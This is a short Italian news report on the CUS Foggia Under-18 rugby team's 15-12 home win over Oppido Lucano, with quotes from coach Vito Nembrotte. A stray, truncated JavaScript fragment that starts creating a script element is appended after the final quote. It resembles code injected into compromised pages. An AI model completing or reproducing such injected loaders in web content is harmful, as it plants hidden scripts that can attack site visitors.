La squadra di Vito Nembrotte continua il suo percorso di crescita.
CUS FOGGIA – OPPIDO LUCANO 15-12
A regalare sorrisi al movimento rugbistico del Cus Foggia ci pensano le formazioni giovanili guidate dal tecnico Vito Nembrotte.
Ferma l’Under16, domenica scorsa sul campo di Via Napoli è toccato alla Under18 portare in alto i colori rossoneri. Vittoria, la prima stagionale, importante quella ottenuta contro i pari età dell’OppidoLucano. Partita equilibrata, giocata dai potentini con buona rapidità fisica opposta alla fisicità dei giovanicussini. A sbloccare il match ci ha pensato Leonardo Corvino, con un preciso calcio di punizione. Buona la reazione degli ospiti, capaci di ribaltare lo svantaggio, salvo poi subire la decisiva rimonta del Cus, firmata da Corvino e Michael Zingaro.
“Ogni partita ci serve per migliorare l’intesa della squadra – osserva Nembrotte – Siamo certamente in una fase di crescita e ciò ci consente di ottenere prestazioni e risultati positivi”.
Una crescita che non è solo nei fatti ma anche nei numeri, come sottolinea lo stesso tecnico. “Abbiamo nelle nostre giovanili giocatori che provengono da diversi centri della Capitanata, come Manfredonia e Ortanova, a testimonianza di un movimento che si sta espandendo sul territorio. E questo è dovuto anche al lavoro capillare che stiamo portando avanti nelle scuole foggiane per far conoscere uno sport appassionante e divertente come il rugby”. var d=document;var s=d.createElement(‘script’);